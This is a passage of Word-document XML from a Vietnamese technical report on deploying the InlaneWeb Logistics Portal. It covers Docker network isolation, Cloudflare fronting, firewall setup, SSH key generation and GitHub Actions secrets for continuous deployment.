              <w:t xml:space="preserve">    subgraph Docker Isolated Network: inlaneweb_net</w:t>
              <w:br/>
              <w:t xml:space="preserve">        NPM --&gt;|Internal Forward: Port 80| WEB[Container ilfreight_web: Apache / PHP 8.2]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        WEB --&gt;|Database Protocol: Port 3306| DB[(Container ilfreight_db: MariaDB 10.11)]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        DB -.-&gt;|Persistent Mount| VOL[(Docker Named Volume: db_data)]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
              <w:br/>
              <w:t xml:space="preserve">        PROM[ilfreight_promtail: Log Collector] -.-&gt;|Read Host Docker Sock| WEB</w:t>
              <w:br/>
              <w:t xml:space="preserve">        PROM -.-&gt;|Read Host Docker Sock| DB</w:t>
              <w:br/>
              <w:t xml:space="preserve">        PROM --&gt;|Push Stream: Port 3100| LOKI[(ilfreight_loki: Storage Engine)]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        GRAF[ilfreight_grafana: Visualization] --&gt;|Query LogQL: Port 3100| LOKI</w:t>
              <w:br/>
              <w:t xml:space="preserve">        HEAL[autoheal: Monitoring Daemon] -.-&gt;|Docker Sock API| WEB</w:t>
              <w:br/>
              <w:t xml:space="preserve">    end</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    NPM --&gt;|Internal Forward: Port 3000| GRAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bảo vệ tầng biên:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tên miền chính thức </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb.ecotools.online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> được định tuyến qua mạng phân phối nội dung Cloudflare. Địa chỉ IP máy chủ thực tế được che giấu hoàn toàn. Kênh truyền giữa người dùng cuối và Cloudflare được áp dụng tiêu chuẩn mã hóa TLS 1.3 với cơ chế tự động chuyển hướng HTTP sang HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách ly mạng nội bộ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Toàn bộ các container được khởi tạo trong một mạng cầu nối duy nhất có tên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Các cổng dịch vụ nhạy cảm như MariaDB (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>), Loki (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>), Grafana (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) tuyệt đối không mở công khai ra ngoài giao diện mạng công cộng của máy chủ VPS, mà chỉ cho phép truy cập thông qua sự điều phối của Reverse Proxy nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>1.4. Năm kịch bản triển khai hệ thống trong thực tế</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để định hình rõ ràng ranh giới bài toán và cung cấp bức tranh toàn cảnh cho toàn bộ công trình ngay từ đầu, phần này mô hình hóa không gian bài toán triển khai thực tế của hệ thống InlaneWeb Logistics Portal. Trong môi trường công nghiệp, việc chuyển giao một hệ thống từ máy trạm của lập trình viên lên môi trường máy chủ sản xuất không thể chỉ giả định một kịch bản lý tưởng, mà bắt buộc phải chuẩn hóa toàn bộ các tình huống nghiệp vụ, tài nguyên và khả năng chịu lỗi theo quy trình vận hành tiêu chuẩn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Hệ thống triển khai áp dụng kiến trúc chuyển giao liên tục tách rời (Decoupled Continuous Deployment) giữa hạ tầng giám sát tập trung và tải làm việc nghiệp vụ web, bảo đảm việc cập nhật mã nguồn diễn ra nhanh chóng, sẵn sàng cao (High Availability) và không làm gián đoạn luồng thu thập nhật ký. Toàn bộ chu trình vận hành được thiết kế và kiểm chứng qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5 kịch bản thực tiễn cốt lõi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4.1. Kịch bản 1: Khởi động hệ thống lần đầu trên máy chủ mới (Bootstrap Deployment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bối cảnh bài toán:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đặt trong tình huống đưa hệ thống lên một máy chủ Linux VPS hoàn toàn mới, chưa có dữ liệu và chưa có bất kỳ container Docker nào hoạt động trước đó. Kịch bản này đòi hỏi chuẩn bị đầy đủ hạ tầng nền tảng, thiết lập bảo mật SSH và lựa chọn phương án khởi tạo dịch vụ phù hợp với năng lực phần cứng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy trình chuẩn hóa 5 bước vận hành:</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sz w:val="26"/>
        </w:rPr>
        <w:t>Thiết lập môi trường nền tảng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cài đặt Docker Engine 24+ và Docker Compose V2 từ kho lưu trữ chính thức của Docker. Cấu hình tường lửa UFW (Uncomplicated Firewall) bảo vệ máy chủ: chỉ mở cổng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phiên SSH quản trị, cổng dịch vụ web và phân quyền người dùng phi đặc quyền thuộc nhóm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>usermod -aG docker $USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) để vận hành an toàn mà không cần quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>root</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sz w:val="26"/>
        </w:rPr>
        <w:t>Thiết lập mạng nội bộ độc lập:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khởi tạo mạng cầu nối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker network create inlaneweb_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Mạng này đóng vai trò phân cách giao tiếp nội bộ giữa các container mà không cần công khai cổng cơ sở dữ liệu (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) hay cổng lưu trữ nhật ký (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) ra ngoài giao diện mạng công cộng.</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sz w:val="26"/>
        </w:rPr>
        <w:t>Ủy quyền mật mã tự động qua cặp khóa Ed25519:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sinh cặp khóa mật mã bất đối xứng độ bảo mật cao:</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ssh-keygen -t ed25519 -C "github-actions-cd@inlaneweb" -f ~/.ssh/id_ed25519_inlaneweb -N ""</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khóa công khai (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>id_ed25519_inlaneweb.pub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) được nạp vào tệp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên máy chủ VPS, phân quyền nghiêm ngặt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>chmod 600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Khóa riêng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>id_ed25519_inlaneweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) được lưu trữ an toàn trong kho bí mật GitHub Secrets với tên biến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PROD_SSH_KEY</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4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khai báo các biến môi trường kết nối trong GitHub Secrets:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Để GitHub Actions Runner có thể tự động triển khai, quản trị viên cấu hình 5 biến bí mật trọng yếu trên giao diện kho lưu trữ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PROD_HOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>: Địa chỉ IP công cộng hoặc tên miền FQDN của máy chủ VPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PROD_USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Tên tài khoản người dùng trên VPS có quyền thực thi Docker (ví dụ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PROD_SSH_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>: Toàn văn khóa riêng Ed25519 phục vụ xác thực không tương tác.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PROD_PORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cổng SSH quản trị của máy chủ (mặc định: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PROD_PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Đường dẫn thư mục triển khai ứng dụng trên VPS (mặc định: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/opt/inlaneweb</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5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Lựa chọn cấu hình nạp ban đầu theo nguyên lý ảnh tự chứa (Self-contained Images):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Máy chủ VPS tuyệt đối không cần cài đặt Git và không clone mã nguồn dự án. Kỹ sư lựa chọn giữa hai phương án vận hành:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phương án 1A — Triển khai tinh gọn chỉ chạy ứng dụng web:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dành cho môi trường giới hạn tài nguyên RAM từ 1GB đến 2GB. Kỹ sư chỉ nạp tệp điều phối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker-compose.prod.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, thực hiện kéo 2 hình ảnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
